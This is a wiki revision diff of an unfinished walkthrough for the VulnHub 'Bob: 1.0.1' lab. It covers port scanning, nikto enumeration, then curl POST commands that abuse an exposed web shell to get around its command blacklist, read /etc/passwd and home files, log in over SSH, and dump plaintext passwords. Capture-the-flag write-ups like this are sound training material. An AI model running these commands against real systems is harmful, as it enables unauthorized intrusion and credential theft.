Difference between revisions of "Bob: 1.0.1 ~ Vulnhub - Walkthrough"
m (→Exploitation) |
m (→Exploitation) |
||
| Line 128: | Line 128: | ||
elliot@Milburg-High:~$ | elliot@Milburg-High:~$ | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Poking around /home(s)... '''seb''' does not seem to have anything interesting and neither does '''jc'''. '''bob''', however, is worth exploring! | ||
| + | |||
| + | <syntaxhighlight lang=shell-session highlight="" line> | ||
| + | elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html | ||
| + | hey n there .old_passwordfile.html | ||
| + | elliot@Milburg-High:/home/bob$ alias | ||
| + | alias cat='echo hey \n there' | ||
| + | |||
| + | *** rolling my eyes *** | ||
| + | |||
| + | elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html | ||
| + | <html> | ||
| + | jc:Qwerty | ||
| + | seb:T1tanium_Pa$$word_Hack3rs_Fear_M3 | ||
| + | </p> | ||
| + | </html> | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Revision as of 06:55, 31 May 2018
Contents
Objective
Get the flag in /
Source: [VulnHub.com]
Status: [In Progress]
Methodology
Define our target
root@kali:# export TANGO=192.168.56.101Discovery
root@kali:# nmap -O -p- -sT -sV -T5 -o nmap.txt $TANGO
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelEntry Point #1 - Port 80 (HTTP)
Enumeration
root@blaksec:~# nikto -h $TANGO
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-05-24 18:19:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x591 0x5669af30ee8f1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7539 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2018-05-24 18:19:49 (GMT-4) (11 seconds)
---------------------------------------------------------------------------Let's take a closer look at that robots.txt
root@kali:~# curl http://$TANGO/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.htmldev_shell.php sounds very promising. Dive dive dive!
Exploitation
After good 30 mins of poking it appeared there is some sort of blaklist - commands like ls, pwd, cat, nc are being blocked. Nothing we can't work around though - all we had to do is to replace ls with find, echo, dir, and cat with strings (see Exploiting web shells - working your way around blacklisted commands for more sweet workarounds).
Let's see what we have!
root@blaksec:~# curl -s -d "in_command=strings /etc/passwd" -X POST http://$TANGO/dev_shell.php
...
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
...Looks like a few regular users on this host. Check them out
curl -s -d "in_command=find /home" -X POST http://$TANGO/dev_shell.php -o files_home.txtBunch of goodies turned up! For the most notable ones:
/home/seb/proftpd-1.3.3c
/home/bob/.old_passwordfile.html
/home/bob/Documents/Secret
/home/bob/Documents/Secret/Keep_Out
/home/bob/Documents/Secret/Keep_Out/Not_Porn
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
/home/bob/Documents/Secret/Keep_Out/Porn
/home/bob/Documents/Secret/Keep_Out/Porn/no_porn_4_u
/home/bob/Documents/staff.txt
/home/bob/Documents/login.txt.gpg
/home/bob/Downloads/Wheel_Of_Fortune.py
/home/bob/Downloads/Hello_Again.py
/home/elliot/theadminisdumb.txtQuick look through the files... few quite interesting entries! The last one was fun to read - elliot b*ches and moans about admin bragging about his new password.. wait.. yei! we have a password!
root@blaksec:~# curl -s -d "in_command=strings /home/elliot/theadminisdumb.txt" -X POST http://$TANGO/dev_shell.php
...
theadminisdumb
...Aaaaaand we're in!!!
# ssh elliot@$TANGO -p 25468
__ __ _ _ _ _____
| \/ (_) | | / ____|
| \ / |_| | |__ _ _ _ __ __ _ | (___ ___ _ ____ _____ _ __
| |\/| | | | '_ \| | | | '__/ _` | \___ \ / _ \ '__\ \ / / _ \ '__|
| | | | | | |_) | |_| | | | (_| | ____) | __/ | \ V / __/ |
|_| |_|_|_|_.__/ \__,_|_| \__, | |_____/ \___|_| \_/ \___|_|
__/ |
|___/
elliot@192.168.56.101's password:
Linux Milburg-High 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
elliot@Milburg-High:~$Poking around /home(s)... seb does not seem to have anything interesting and neither does jc. bob, however, is worth exploring!
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
hey n there .old_passwordfile.html
elliot@Milburg-High:/home/bob$ alias
alias cat='echo hey \n there'
*** rolling my eyes ***
elliot@Milburg-High:/home/bob$ strings .old_passwordfile.html
<html>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>